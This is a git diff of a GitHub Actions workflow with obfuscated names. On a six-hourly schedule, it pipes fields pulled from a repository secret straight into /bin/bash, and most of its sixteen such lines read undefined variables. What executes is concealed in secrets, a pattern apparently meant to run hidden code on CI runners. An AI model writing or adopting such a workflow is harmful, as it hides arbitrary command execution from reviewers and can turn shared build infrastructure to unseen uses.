--- a/.github/workflows/guyindu0918.yml
+++ b/.github/workflows/guyindu0918.yml
@@ -1,9 +1,8 @@
 name: guyindu0918
-
 on:
   workflow_dispatch:
   schedule:
-    - cron: '37 5/6 * * *'
+    - cron: '4 1/6 * * *'
 jobs:
   build:
     runs-on: ubuntu-latest
@@ -11,23 +10,22 @@ jobs:
       - uses: actions/checkout@v4
       - name: guyindu0918
         env:
-          wasyy112: ${{ secrets.wasyy112 }}
+          jc0: ${{ secrets.jc0 }}
         run: |
-          echo $wasyy112 | jq -r .ip68820 | /bin/bash
-          echo $rdm5 | jq -r .aae0096 | /bin/bash
-          echo $uhtgc470 | jq -r .atrn3 | /bin/bash
-          echo $u7 | jq -r .ddmba510 | /bin/bash
-          echo $ei480 | jq -r .nsz3 | /bin/bash
-          echo $pm269 | jq -r .qkh9 | /bin/bash
-          echo $xh3 | jq -r .fbpag54 | /bin/bash
-          echo $fowf39 | jq -r .oztqc28148 | /bin/bash
-          echo $dyzd26 | jq -r .mvof23 | /bin/bash
-          echo $q7424 | jq -r .ozgyq60 | /bin/bash
-          echo $dnesq09 | jq -r .phs2932 | /bin/bash
-          echo $rga92276 | jq -r .lqtgb0 | /bin/bash
-          echo $oetfp06934 | jq -r .ns5729 | /bin/bash
-          echo $va8939 | jq -r .qmp900 | /bin/bash
-          echo $y52477 | jq -r .e8585 | /bin/bash
-          echo $c09 | jq -r .trld64748 | /bin/bash
-          echo $x94 | jq -r .x771 | /bin/bash
+          echo $jc0 | jq -r .k5783 | /bin/bash
+          echo $yicxu815 | jq -r .ymfp60 | /bin/bash
+          echo $u18774 | jq -r .slipc3 | /bin/bash
+          echo $ieby28 | jq -r .bj78 | /bin/bash
+          echo $gyp55 | jq -r .bax6 | /bin/bash
+          echo $bts50110 | jq -r .zn663 | /bin/bash
+          echo $sfink68539 | jq -r .ygfoo2 | /bin/bash
+          echo $qh93 | jq -r .yfaj05435 | /bin/bash
+          echo $jp7892 | jq -r .eud7690 | /bin/bash
+          echo $yx068 | jq -r .y3 | /bin/bash
+          echo $cw01855 | jq -r .e90 | /bin/bash
+          echo $blc015 | jq -r .s8 | /bin/bash
+          echo $lxrls3484 | jq -r .j946 | /bin/bash
+          echo $dy9553 | jq -r .pc61579 | /bin/bash
+          echo $bu146 | jq -r .fqf033 | /bin/bash
+          echo $c0 | jq -r .sya02 | /bin/bash
 
